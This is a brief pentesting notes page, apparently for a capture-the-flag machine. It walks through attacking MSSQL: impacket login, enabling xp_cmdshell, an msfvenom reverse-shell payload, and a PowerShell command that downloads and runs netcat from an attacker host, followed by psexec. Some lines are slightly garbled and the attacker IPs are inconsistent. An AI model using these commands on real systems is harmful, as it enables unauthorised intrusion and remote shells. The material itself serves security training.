Pentesting MsSql

ms-sql-s port 1433

  • Use impacket mssqlclient.py to connect

python mssqlclient.py ARCHETYPE/sql_svc@10.129.62.77 -windows-auth

  • https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

  • Check what is the role we have in the server

SELECT is_srvrolemember('sysadmin');

  • If the output is 1 , it translates to True .

  • Check to see if xp_cmdshell is enabled

SQL> EXEC xp_cmdshell 'net user';

  • Set up the command execution through the xp_cmdshell:

EXEC xp_cmdshell 'net user'; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell

  • First as it’s disabled by default:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure; - Enabling the sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

  • Now we are able to execute system commands:

xp_cmdshell "whoami"

  • Better Command Execution

xp_cmdshell "powershell -c pwd"

  • Get a shell on target with nc or msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.154 LPORT=80 -f exe -o shell.exe
python3 -m http.server
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe; ./nc64.exe"

  • Find the admin password from the shell

python /usr/local/bin/psexec.py administrator@10.129.62.77
PreviousPentesting RsyncNextScanning

Last updated